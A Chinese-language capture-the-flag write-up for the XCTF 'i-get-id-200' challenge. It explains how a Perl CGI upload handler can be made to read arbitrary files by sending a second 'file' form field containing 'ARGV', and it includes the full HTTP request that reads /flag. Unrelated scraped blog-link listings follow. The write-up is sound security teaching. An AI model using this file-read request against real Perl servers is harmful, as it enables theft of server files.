i-get-id-200

  • 题目描述

    嗯。。我刚建好了一个网站

  • 解题过程

    一共有三个页面

    • Hello World

      告诉了页面是perl写的

    • Forms

      输入name和age会返回渲染后的字符串

      搜了一下,perl不能ssti

    • File

      可以上传文件,上传成功后会打印文件内容

      感觉上传文件这里有漏洞,但是对perl环境很陌生,去看看相关的用法

    • 文件读取,并打印文件内容

      open(DATA, "<file.txt") or die "file.txt 文件无法打开, $!";
      
# DATA 为文件句柄用于读取文件
      
while(<DATA>){
      
   print "$_";
      
}

    • 文件上传

       #!/usr/bin/perl
      
 use CGI;
      
 my $cgi = new CGI;
      
 my $dir = 'sub';
      
 my $file = $cgi->param('file');
      
 $file=~m/^.*(\\|\/)(.*)/;
      
 # strip the remote path and keep the filename
      
 my $name = $2;
      
 open(LOCAL, ">$dir/$name") or print 'error';
      
 while(<$file>) {
      
    print LOCAL $_;
      
 }
      
 print $cgi->header();
      
 print $dir/$name;
      
 print "$file has been successfully uploaded... thank you.\n";enter code here

      没什么思路,去看了wp,网上wp清一色猜测后端代码。。。

      找到了源码(节选)

      if ($cgi->upload('file')) {
      
    my $file = $cgi->param('file');
      
    while (<$file>) {
      
        print "$_";
      
        print "<br />";
      
    }
      
}

      涉及几个知识点:

      • 这里需要用到ARGV,它是perl默认用来接收参数的数组,类似flask的request.argv
      • $cgi->param('file');会优先选取第一个file参数,类似于参数污染
      • 结合起来就会达到<$file> == ARGV[0]的效果,可以进行任意文件读取了
      POST /cgi-bin/file.pl?/flag HTTP/1.1
      
Host: 220.249.52.133:57967
      
Content-Length: 411
      
Cache-Control: max-age=0
      
Origin: http://220.249.52.133:57967
      
Upgrade-Insecure-Requests: 1
      
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      
Referer: http://220.249.52.133:57967/cgi-bin/file.pl?file=../file.pl
      
Accept-Encoding: gzip, deflate
      
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
      
Connection: close

------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"
      
Content-Type: text/plain

ARGV
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="file"; filename="draft.txt"
      
Content-Type: text/plain

asdasd
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
      
Content-Disposition: form-data; name="Submit!"

Submit!
      
------WebKitFormBoundaryAcRiYZHdukQ6xuzQ--

      注意这里需要多加一组form数据来写ARGV

  • 参考

XCTF-i-get-id-200的更多相关文章

  1. [Android]Android端ORM框架——RapidORM(v2.0)

    以下内容为原创,欢迎转载,转载请注明 来自天天博客:http://www.cnblogs.com/tiantianbyconan/p/5626716.html [Android]Android端ORM ...

  2. SQL Server 深入解析索引存储(上)

    标签:SQL SERVER/MSSQL SERVER/数据库/DBA/索引体系结构/堆/聚集索引 概述 最近要分享一个课件就重新把这块知识整理了一遍出来,篇幅有点长,想要理解的透彻还是要上机实践. 聚 ...

  3. [开源ORM] SqliteSugar 3.x .net Core版本成功上线

    SqliteSqlSugar 3.X API 作为支持.NET CORE 为数不多的ORM之一,除了具有优越的性能外,还拥有强大的功能,不只是满足你的增,删,查和改.实质上拥有更多你想像不到的功能,当 ...

  4. 改善SQL语句(转)

    二.改善SQL语句          很多人不知道SQL语句在SQL SERVER中是如何执行的,他们担心自己所写的SQL语句会被SQL SERVER误解.比如:   select * from ta ...

  5. 转载:SqlServer数据库性能优化详解

    本文转载自:http://blog.csdn.net/andylaudotnet/article/details/1763573 性能调节的目的是通过将网络流通.磁盘 I/O 和 CPU 时间减到最小 ...

  6. mysql-批量修改表字段中的某一部分内容

    MySQL批量替换指定字段字符串语句(1)updat 表名 set 字段名=replac(字段名,'原来的内容','替换后的内容') 举一个例子,就是我实际操作的时候的命令: update cpg14 ...

  7. 记一次MYSQL更新优化

    引言 今天(August 5, 2015 5:34 PM)在给数据库中一张表的结构做一次调整,添加了几个字段,后面对之前的数据进行刷新,刷新的内容是:对其中的一个已有字段url进行匹配,然后更新新加的 ...

  8. A Quick Introduction to Linux Policy Routing

    A Quick Introduction to Linux Policy Routing 29 May 2013 In this post, I’m going to introduce you to ...

  9. 转载:postgresql分区与优化

    --对于分区表constraint_exclusion 这个参数需要配置为partition或on postgres=# show constraint_exclusion ; constraint_ ...

  10. 楼盘信息sq

    ID:1 楼盘名称:帝豪国际 网址:http://shangqiu.jiwu.com/loupan/239023.html 价格:2500元/平米 关注人数:497 地址:长寿大道南段 情况:在售 大 ...

随机推荐

  1. C# 基础 - 委托、事件

    1. 委托 sequenceDiagram 方法->>委托: 返回值和入参一样 委托->>方法: 调用委托就是调用绑定的方法 delegate int NumTest(int ...

  2. P1177【模板】快速排序(JAVA语言)

    import java.util.Scanner; import java.util.ArrayList; import java.util.Collections; import java.util ...

  3. PTA 线性表元素的区间删除

    6-8 线性表元素的区间删除 (20 分)   给定一个顺序存储的线性表,请设计一个函数删除所有值大于min而且小于max的元素.删除后表中剩余元素保持顺序存储,并且相对位置不能改变. 函数接口定义: ...

  4. od快捷键

    视图.查看相关: Alt+l  记录 Alt+e 可执行模块 Alt+m 内存 Alt+c cpu(反汇编视图) Ctrl+p 补丁 Alt+k 调用堆栈 Alt+b 断点 Alt+f5 设置窗口总在 ...

  5. JavaScript中函数防抖、节流

    码文不易,转载请带上本文链接,感谢~ https://www.cnblogs.com/echoyya/p/14565642.html 目录 码文不易,转载请带上本文链接,感谢~ https://www ...

  6. Genymotion下载模拟器慢

    •问题来源 Genymotion 是个很不错的 Android 模拟器,系统更新快,启动速度快: 但是服务器在国外,Android 镜像下载起来那个速度就不敢恭维了: 当然如果你可以[科学,上网]就另 ...

  7. 全网最详细的Linux命令系列-cp命令

    cp命令用来复制文件或者目录,是Linux系统中最常用的命令之一.一般情况下,shell会设置一个别名,在命令行下复制文件时,如果目标文件已经存在,就会询问是否覆盖,不管你是否使用-i参数.但是如果是 ...

  8. 小白都能学会的Java注解与反射机制

    前言 Java注解和反射是很基础的Java知识了,为何还要讲它呢?因为我在面试应聘者的过程中,发现不少面试者很少使用过注解和反射,甚至有人只能说出@Override这一个注解.我建议大家还是尽量能在开 ...

  9. C++并发与多线程学习笔记--单例设计模式、共享数据分析

    设计模式 共享数据分析 call_once 设计模式 开发程序中的一些特殊写法,这些写法和常规写法不一样,但是程序灵活,维护起来方便,别人接管起来,阅读代码的时候都会很痛苦.用设计模式理念写出来的代码 ...

  10. 深入理解Java并发框架AQS系列(四):共享锁(Shared Lock)

    深入理解Java并发框架AQS系列(一):线程 深入理解Java并发框架AQS系列(二):AQS框架简介及锁概念 深入理解Java并发框架AQS系列(三):独占锁(Exclusive Lock) 深入 ...